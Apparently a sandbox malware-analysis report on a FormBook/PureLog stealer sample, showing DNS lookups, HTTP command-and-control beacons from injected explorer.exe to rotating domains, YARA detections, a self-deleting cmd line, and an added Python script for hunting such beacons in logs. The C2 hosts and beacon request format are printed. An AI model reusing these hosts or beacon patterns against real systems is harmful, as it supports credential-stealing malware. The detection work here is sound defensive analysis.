Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 19, 2024 10:52:45.214251041 CEST | 192.168.2.8 | 1.1.1.1 | 0xdb85 | Standard query (0) | www.hacks.digital | A (IP address) | IN (0x0001) | false
Jul 19, 2024 10:53:06.198360920 CEST | 192.168.2.8 | 1.1.1.1 | 0x979d | Standard query (0) | www.creativelyloud.com | A (IP address) | IN (0x0001) | false
Jul 19, 2024 10:53:45.880135059 CEST | 192.168.2.8 | 1.1.1.1 | 0x1fbe | Standard query (0) | www.y7rak9.com | A (IP address) | IN (0x0001) | false
Jul 19, 2024 10:54:06.574753046 CEST | 192.168.2.8 | 1.1.1.1 | 0xd241 | Standard query (0) | www.wordcraftart.fun | A (IP address) | IN (0x0001) | false
Jul 19, 2024 10:54:27.050759077 CEST | 192.168.2.8 | 1.1.1.1 | 0xed42 | Standard query (0) | www.suv.xyz | A (IP address) | IN (0x0001) | false
Jul 19, 2024 10:54:47.479521036 CEST | 192.168.2.8 | 1.1.1.1 | 0x3a35 | Standard query (0) | www.mirotcg.info | A (IP address) | IN (0x0001) | false
Jul 19, 2024 10:55:08.003603935 CEST | 192.168.2.8 | 1.1.1.1 | 0xff0 | Standard query (0) | www.mxrkpkngishbdss.xyz | A (IP address) | IN (0x0001) | false
Jul 19, 2024 10:55:28.464570999 CEST | 192.168.2.8 | 1.1.1.1 | 0x1bc8 | Standard query (0) | www.lawyers-br-pt-9390663.fyi | A (IP address) | IN (0x0001) | false
Jul 19, 2024 10:55:48.902128935 CEST | 192.168.2.8 | 1.1.1.1 | 0x7357 | Standard query (0) | www.boostgrowmode.com | A (IP address) | IN (0x0001) | false
Jul 19, 2024 10:56:09.339133978 CEST | 192.168.2.8 | 1.1.1.1 | 0x17c5 | Standard query (0) | www.syedlatief.com | A (IP address) | IN (0x0001) | false
Jul 19, 2024 10:56:32.073312044 CEST | 192.168.2.8 | 1.1.1.1 | 0x8e39 | Standard query (0) | www.gtur.top | A (IP address) | IN (0x0001) | false
DNS Answers
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 19, 2024 10:52:45.932492971 CEST | 1.1.1.1 | 192.168.2.8 | 0xdb85 | No error (0) | www.hacks.digital |  | 209.196.146.115 | A (IP address) | IN (0x0001) | false
Jul 19, 2024 10:53:06.508316994 CEST | 1.1.1.1 | 192.168.2.8 | 0x979d | No error (0) | www.creativelyloud.com | parkingpage.namecheap.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 19, 2024 10:53:06.508316994 CEST | 1.1.1.1 | 192.168.2.8 | 0x979d | No error (0) | parkingpage.namecheap.com |  | 91.195.240.19 | A (IP address) | IN (0x0001) | false
Jul 19, 2024 10:53:46.659255981 CEST | 1.1.1.1 | 192.168.2.8 | 0x1fbe | No error (0) | www.y7rak9.com | m-m.kkmgxzcdn.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 19, 2024 10:53:46.659255981 CEST | 1.1.1.1 | 192.168.2.8 | 0x1fbe | No error (0) | m-m.kkmgxzcdn.com | mm.apkdowncdn.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 19, 2024 10:53:46.659255981 CEST | 1.1.1.1 | 192.168.2.8 | 0x1fbe | No error (0) | mm.apkdowncdn.com | msdklf.dsaf.apkdowncdn.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 19, 2024 10:53:46.659255981 CEST | 1.1.1.1 | 192.168.2.8 | 0x1fbe | No error (0) | msdklf.dsaf.apkdowncdn.com |  | 206.119.184.155 | A (IP address) | IN (0x0001) | false
Jul 19, 2024 10:53:46.659255981 CEST | 1.1.1.1 | 192.168.2.8 | 0x1fbe | No error (0) | msdklf.dsaf.apkdowncdn.com |  | 206.119.184.153 | A (IP address) | IN (0x0001) | false
Jul 19, 2024 10:53:46.659255981 CEST | 1.1.1.1 | 192.168.2.8 | 0x1fbe | No error (0) | msdklf.dsaf.apkdowncdn.com |  | 206.119.184.154 | A (IP address) | IN (0x0001) | false
Jul 19, 2024 10:54:06.700939894 CEST | 1.1.1.1 | 192.168.2.8 | 0xd241 | No error (0) | www.wordcraftart.fun |  | 170.39.213.118 | A (IP address) | IN (0x0001) | false
Jul 19, 2024 10:54:27.074752092 CEST | 1.1.1.1 | 192.168.2.8 | 0xed42 | No error (0) | www.suv.xyz |  | 3.64.163.50 | A (IP address) | IN (0x0001) | false
Jul 19, 2024 10:54:47.505238056 CEST | 1.1.1.1 | 192.168.2.8 | 0x3a35 | No error (0) | www.mirotcg.info | mirotcg.info |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 19, 2024 10:54:47.505238056 CEST | 1.1.1.1 | 192.168.2.8 | 0x3a35 | No error (0) | mirotcg.info |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Jul 19, 2024 10:54:47.505238056 CEST | 1.1.1.1 | 192.168.2.8 | 0x3a35 | No error (0) | mirotcg.info |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Jul 19, 2024 10:55:08.045711994 CEST | 1.1.1.1 | 192.168.2.8 | 0xff0 | Server failure (2) | www.mxrkpkngishbdss.xyz | none | none | A (IP address) | IN (0x0001) | false
Jul 19, 2024 10:55:28.990845919 CEST | 1.1.1.1 | 192.168.2.8 | 0x1bc8 | No error (0) | www.lawyers-br-pt-9390663.fyi | ssl1.prod.systemdragon.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 19, 2024 10:55:28.990845919 CEST | 1.1.1.1 | 192.168.2.8 | 0x1bc8 | No error (0) | ssl1.prod.systemdragon.com |  | 104.18.187.223 | A (IP address) | IN (0x0001) | false
Jul 19, 2024 10:55:28.990845919 CEST | 1.1.1.1 | 192.168.2.8 | 0x1bc8 | No error (0) | ssl1.prod.systemdragon.com |  | 104.18.188.223 | A (IP address) | IN (0x0001) | false
Jul 19, 2024 10:55:49.043155909 CEST | 1.1.1.1 | 192.168.2.8 | 0x7357 | No error (0) | www.boostgrowmode.com | pixie.porkbun.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 19, 2024 10:55:49.043155909 CEST | 1.1.1.1 | 192.168.2.8 | 0x7357 | No error (0) | pixie.porkbun.com |  | 44.227.65.245 | A (IP address) | IN (0x0001) | false
Jul 19, 2024 10:55:49.043155909 CEST | 1.1.1.1 | 192.168.2.8 | 0x7357 | No error (0) | pixie.porkbun.com |  | 44.227.76.166 | A (IP address) | IN (0x0001) | false
Jul 19, 2024 10:56:09.595905066 CEST | 1.1.1.1 | 192.168.2.8 | 0x17c5 | No error (0) | www.syedlatief.com | syedlatief.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 19, 2024 10:56:09.595905066 CEST | 1.1.1.1 | 192.168.2.8 | 0x17c5 | No error (0) | syedlatief.com |  | 162.241.244.34 | A (IP address) | IN (0x0001) | false
Jul 19, 2024 10:56:32.632416964 CEST | 1.1.1.1 | 192.168.2.8 | 0x8e39 | No error (0) | www.gtur.top |  | 206.238.13.219 | A (IP address) | IN (0x0001) | false
                                                    • www.hacks.digital
                                                    • www.creativelyloud.com
                                                    • www.y7rak9.com
                                                    • www.wordcraftart.fun
                                                    • www.suv.xyz
                                                    • www.mirotcg.info
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49430 | 209.196.146.115 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jul 19, 2024 10:52:45.942774057 CEST | 159 | OUT | GET /v15n/?JRv=XrEdp4JX&sr=XUieWyy5h/t2CT62Vq8i5x/kR8G+I8pB2jZaxMIrh4lgqb/JgSc0aR4As1Wt1kkrKMMr HTTP/1.1
                                                    Host: www.hacks.digital
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49431 | 91.195.240.19 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jul 19, 2024 10:53:06.518711090 CEST | 164 | OUT | GET /v15n/?sr=3q+gD+8d2JqJcaFj8j5bP1Jm3mKwB6TbJO3aLoAeIjtgFnwNom6OyZtNSFOdFVlOxo+Q&JRv=XrEdp4JX HTTP/1.1
                                                    Host: www.creativelyloud.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49434 | 206.119.184.155 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jul 19, 2024 10:53:46.666794062 CEST | 156 | OUT | GET /v15n/?sr=3ADokGHGfx6TKsz50QsuRVYX3rGFBDL5q/42DkYvURdCZMVWG44MA4Ku4Cx/hAPmB3dD&JRv=XrEdp4JX HTTP/1.1
                                                    Host: www.y7rak9.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49435 | 170.39.213.118 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jul 19, 2024 10:54:06.708018064 CEST | 162 | OUT | GET /v15n/?JRv=XrEdp4JX&sr=90AMgQB2NDTL00GN4iM7gX4woUZ3upfO9yCtQrIdbfLXDlf/PtDiDRZV6/VBSbbmWq2J HTTP/1.1
                                                    Host: www.wordcraftart.fun
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49436 | 3.64.163.50 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jul 19, 2024 10:54:27.084312916 CEST | 153 | OUT | GET /v15n/?sr=vAzU6JYnADLUgEemxRzkUQMY3qynAzl+X72N7mZcinpf+VhfhGS/tUhrfESL21IfICFO&JRv=XrEdp4JX HTTP/1.1
                                                    Host: www.suv.xyz
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49437 | 3.33.130.190 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jul 19, 2024 10:54:47.510968924 CEST | 158 | OUT | GET /v15n/?JRv=XrEdp4JX&sr=eKJokfhRlZ6TJn38gns6VD6cymqx2Da3HErd8WBjDQDJ0kZiIGavcwgaXT3T04xjS0au HTTP/1.1
                                                    Host: www.mirotcg.info
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
Jul 19, 2024 10:54:47.982444048 CEST | 339 | IN | HTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Fri, 19 Jul 2024 08:54:47 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 199
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4a 52 76 3d 58 72 45 64 70 34 4a 58 26 73 72 3d 65 4b 4a 6f 6b 66 68 52 6c 5a 36 54 4a 6e 33 38 67 6e 73 36 56 44 36 63 79 6d 71 78 32 44 61 33 48 45 72 64 38 57 42 6a 44 51 44 4a 30 6b 5a 69 49 47 61 76 63 77 67 61 58 54 33 54 30 34 78 6a 53 30 61 75 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?JRv=XrEdp4JX&sr=eKJokfhRlZ6TJn38gns6VD6cymqx2Da3HErd8WBjDQDJ0kZiIGavcwgaXT3T04xjS0au"}</script></head></html>
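The six sessions above share one shape: a non-browser process (explorer.exe, PID 4084) sends a GET to /v15n/ with the same two parameter names, JRv fixed at XrEdp4JX and sr changing every time, to a different host on each connection, roughly twenty seconds apart, with Connection: close. That shape is what a hunt over proxy or EDR HTTP logs can key on without relying on the domains, which rotate. The script below is an added example written for this page; it is not code from the report, from Joe Security or from the malware. The explorer.exe log lines are transcribed from the sessions above, while the log line format, the updater.exe process and the example.net hosts are assumptions constructed for contrast.

```python
"""Hunt for FormBook-style C2 beaconing in HTTP request logs.

Added example, not part of the Joe Sandbox report. It flags one process
issuing requests that share method, URI path and query-parameter names
but go to many distinct hosts inside a short window, which is the pattern
the report's six explorer.exe sessions show.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qsl, urlsplit

# Assumed log format: "<iso-timestamp> <pid> <image> <host> <method> <target>".
# explorer.exe lines: transcribed from the report's HTTP sessions.
# updater.exe lines: constructed benign traffic (hypothetical process and hosts).
SAMPLE_LOG = r"""
2024-07-19T10:52:45.942 4084 C:\Windows\explorer.exe www.hacks.digital GET /v15n/?JRv=XrEdp4JX&sr=XUieWyy5h/t2CT62Vq8i5x/kR8G+I8pB2jZaxMIrh4lgqb/JgSc0aR4As1Wt1kkrKMMr
2024-07-19T10:53:06.518 4084 C:\Windows\explorer.exe www.creativelyloud.com GET /v15n/?sr=3q+gD+8d2JqJcaFj8j5bP1Jm3mKwB6TbJO3aLoAeIjtgFnwNom6OyZtNSFOdFVlOxo+Q&JRv=XrEdp4JX
2024-07-19T10:53:46.666 4084 C:\Windows\explorer.exe www.y7rak9.com GET /v15n/?sr=3ADokGHGfx6TKsz50QsuRVYX3rGFBDL5q/42DkYvURdCZMVWG44MA4Ku4Cx/hAPmB3dD&JRv=XrEdp4JX
2024-07-19T10:54:06.708 4084 C:\Windows\explorer.exe www.wordcraftart.fun GET /v15n/?JRv=XrEdp4JX&sr=90AMgQB2NDTL00GN4iM7gX4woUZ3upfO9yCtQrIdbfLXDlf/PtDiDRZV6/VBSbbmWq2J
2024-07-19T10:54:27.084 4084 C:\Windows\explorer.exe www.suv.xyz GET /v15n/?sr=vAzU6JYnADLUgEemxRzkUQMY3qynAzl+X72N7mZcinpf+VhfhGS/tUhrfESL21IfICFO&JRv=XrEdp4JX
2024-07-19T10:54:47.510 4084 C:\Windows\explorer.exe www.mirotcg.info GET /v15n/?JRv=XrEdp4JX&sr=eKJokfhRlZ6TJn38gns6VD6cymqx2Da3HErd8WBjDQDJ0kZiIGavcwgaXT3T04xjS0au
2024-07-19T10:53:00.000 2200 C:\Tools\updater.exe update.example.net GET /catalog/v2/manifest.json?channel=stable
2024-07-19T10:53:01.000 2200 C:\Tools\updater.exe cdn.example.net GET /files/updater-1.2.3.msi
2024-07-19T10:58:00.000 2200 C:\Tools\updater.exe update.example.net GET /catalog/v2/manifest.json?channel=stable
"""


def parse_log(text):
    """Parse the assumed log format. Parameter names become the grouping key;
    the raw query string is kept only to check that the values rotate."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, pid, image, host, method, target = line.split(maxsplit=5)
        parts = urlsplit(target)
        params = parse_qsl(parts.query, keep_blank_values=True)
        records.append({
            "ts": datetime.fromisoformat(ts),
            "pid": int(pid),
            "image": image,
            "host": host,
            "method": method,
            "path": parts.path,
            "param_keys": tuple(sorted(k for k, _ in params)),
            "query": parts.query,
        })
    return records


def find_beacon_clusters(records, min_hosts=4, window=timedelta(minutes=5)):
    """Return clusters where one process sends requests with identical method,
    path and parameter names to at least `min_hosts` distinct hosts within
    `window`. Requests with no query parameters are skipped so that ordinary
    same-path fetches such as /favicon.ico across many sites do not fire."""
    groups = defaultdict(list)
    for r in records:
        if r["param_keys"]:
            groups[(r["pid"], r["image"], r["method"], r["path"], r["param_keys"])].append(r)

    hits = []
    for (pid, image, method, path, keys), reqs in groups.items():
        reqs.sort(key=lambda r: r["ts"])
        for i, first in enumerate(reqs):
            in_window = [r for r in reqs[i:] if r["ts"] - first["ts"] <= window]
            hosts = sorted({r["host"] for r in in_window})
            if len(hosts) >= min_hosts:
                hits.append({
                    "pid": pid,
                    "image": image,
                    "method": method,
                    "path": path,
                    "param_keys": keys,
                    "hosts": hosts,
                    "first_seen": in_window[0]["ts"],
                    "last_seen": in_window[-1]["ts"],
                    # In the report sr= changes per request while JRv= stays fixed.
                    "values_rotate": len({r["query"] for r in in_window}) > 1,
                })
                break  # one finding per cluster is enough for triage
    return hits


if __name__ == "__main__":
    for hit in find_beacon_clusters(parse_log(SAMPLE_LOG)):
        print(f"PID {hit['pid']} {hit['image']}: {hit['method']} {hit['path']} "
              f"params={hit['param_keys']} to {len(hit['hosts'])} hosts "
              f"between {hit['first_seen']:%H:%M:%S} and {hit['last_seen']:%H:%M:%S}")
        for host in hit["hosts"]:
            print("   ", host)
```

The cluster this returns for the report's traffic is PID 4084, GET /v15n/, parameter names (JRv, sr), six hosts in about two minutes, values rotating. Two further signals on this page are worth attaching to such a hit in a real pipeline: the request sizes (159, 164, 156, 162, 153, 158 bytes) equal the request line plus the Host and Connection headers plus the seven NUL bytes shown in each Data Raw line, so the NUL tail is on the wire with every beacon; and the DNS answers resolve several of the candidate hosts to registrar parking pages (parkingpage.namecheap.com, pixie.porkbun.com), which is typical of decoy domains in a rotating list. The strongest context signal remains the process itself: explorer.exe with no browser involved has no business issuing these requests.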


                                                    Target ID:0
                                                    Start time:04:52:07
                                                    Start date:19/07/2024
                                                    Path:C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe"
                                                    Imagebase:0xd60000
                                                    File size:620'544 bytes
                                                    MD5 hash:F640126D8E76C2A343754FF0F41C1EEF
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1391140026.0000000005A20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1388307588.000000000315B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1388754633.0000000004119000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1388754633.0000000004119000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1388754633.0000000004119000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1388754633.0000000004119000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1388754633.0000000004119000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:3
                                                    Start time:04:52:08
                                                    Start date:19/07/2024
                                                    Path:C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe"
                                                    Imagebase:0x670000
                                                    File size:620'544 bytes
                                                    MD5 hash:F640126D8E76C2A343754FF0F41C1EEF
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:4
                                                    Start time:04:52:09
                                                    Start date:19/07/2024
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\Explorer.EXE
                                                    Imagebase:0x7ff62d7d0000
                                                    File size:5'141'208 bytes
                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000004.00000002.3839526492.0000000010EC9000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:5
                                                    Start time:04:52:12
                                                    Start date:19/07/2024
                                                    Path:C:\Windows\SysWOW64\cscript.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\SysWOW64\cscript.exe"
                                                    Imagebase:0x620000
                                                    File size:144'896 bytes
                                                    MD5 hash:CB601B41D4C8074BE8A84AED564A94DC
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.3820022788.0000000003180000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3820022788.0000000003180000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3820022788.0000000003180000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.3820022788.0000000003180000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.3820022788.0000000003180000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.3819748664.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3819748664.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3819748664.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.3819748664.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.3819748664.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:moderate
                                                    Has exited:false

                                                    Target ID:6
                                                    Start time:04:52:15
                                                    Start date:19/07/2024
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:/c del "C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe"
                                                    Imagebase:0xa40000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:7
                                                    Start time:04:52:15
                                                    Start date:19/07/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true


                                                      Execution Graph

                                                      Execution Coverage:5.7%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:75
                                                      Total number of Limit Nodes:4
                                                      execution_graph 16382 2f9dff8 16383 2f9e03e 16382->16383 16386 2f9e1d8 16383->16386 16389 2f9d8d0 16386->16389 16390 2f9e240 DuplicateHandle 16389->16390 16391 2f9e12b 16390->16391 16392 2f9bf60 16393 2f9bfa8 GetModuleHandleW 16392->16393 16394 2f9bfa2 16392->16394 16395 2f9bfd5 16393->16395 16394->16393 16396 2f947b0 16397 2f947bf 16396->16397 16401 2f94fd8 16396->16401 16406 2f94724 16397->16406 16399 2f9493e 16402 2f94ffd 16401->16402 16410 2f950e8 16402->16410 16414 2f950d7 16402->16414 16407 2f9472f 16406->16407 16422 2f9693c 16407->16422 16409 2f98028 16409->16399 16411 2f9510f 16410->16411 16412 2f951ec 16411->16412 16418 2f94ce0 16411->16418 16416 2f9510f 16414->16416 16415 2f951ec 16415->16415 16416->16415 16417 2f94ce0 CreateActCtxA 16416->16417 16417->16415 16419 2f96178 CreateActCtxA 16418->16419 16421 2f9623b 16419->16421 16423 2f96947 16422->16423 16426 2f97c14 16423->16426 16425 2f9814d 16425->16409 16427 2f97c1f 16426->16427 16430 2f97c44 16427->16430 16429 2f98222 16429->16425 16431 2f97c4f 16430->16431 16434 2f97c74 16431->16434 16433 2f98325 16433->16429 16435 2f97c7f 16434->16435 16437 2f99593 16435->16437 16440 2f9bc4a 16435->16440 16436 2f995d1 16436->16433 16437->16436 16444 2f9dd30 16437->16444 16448 2f9bc78 16440->16448 16451 2f9bc68 16440->16451 16441 2f9bc56 16441->16437 16445 2f9dd51 16444->16445 16446 2f9dd75 16445->16446 16472 2f9dee0 16445->16472 16446->16436 16455 2f9bd62 16448->16455 16449 2f9bc87 16449->16441 16452 2f9bc78 16451->16452 16454 2f9bd62 LoadLibraryExW 16452->16454 16453 2f9bc87 16453->16441 16454->16453 16456 2f9bd81 16455->16456 16457 2f9bd9c 16455->16457 16456->16457 16460 2f9c008 16456->16460 16464 2f9bff8 16456->16464 16457->16449 16461 2f9c01c 16460->16461 16463 2f9c041 16461->16463 16468 2f9b7a0 16461->16468 16463->16457 16465 2f9c008 16464->16465 16466 2f9c041 16465->16466 16467 2f9b7a0 LoadLibraryExW 16465->16467 16466->16457 16467->16466 16469 2f9c1e8 
LoadLibraryExW 16468->16469 16471 2f9c261 16469->16471 16471->16463 16474 2f9deed 16472->16474 16473 2f9df27 16473->16446 16474->16473 16476 2f9d808 16474->16476 16477 2f9d813 16476->16477 16479 2f9e838 16477->16479 16480 2f9d934 16477->16480 16481 2f9d93f 16480->16481 16482 2f97c74 LoadLibraryExW 16481->16482 16483 2f9e8a7 16482->16483 16483->16479

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 17 2f9616d-2f96239 CreateActCtxA 19 2f9623b-2f96241 17->19 20 2f96242-2f9629c 17->20 19->20 27 2f962ab-2f962af 20->27 28 2f9629e-2f962a1 20->28 29 2f962b1-2f962bd 27->29 30 2f962c0 27->30 28->27 29->30 32 2f962c1 30->32 32->32
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 02F96229
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1388000590.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2f90000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
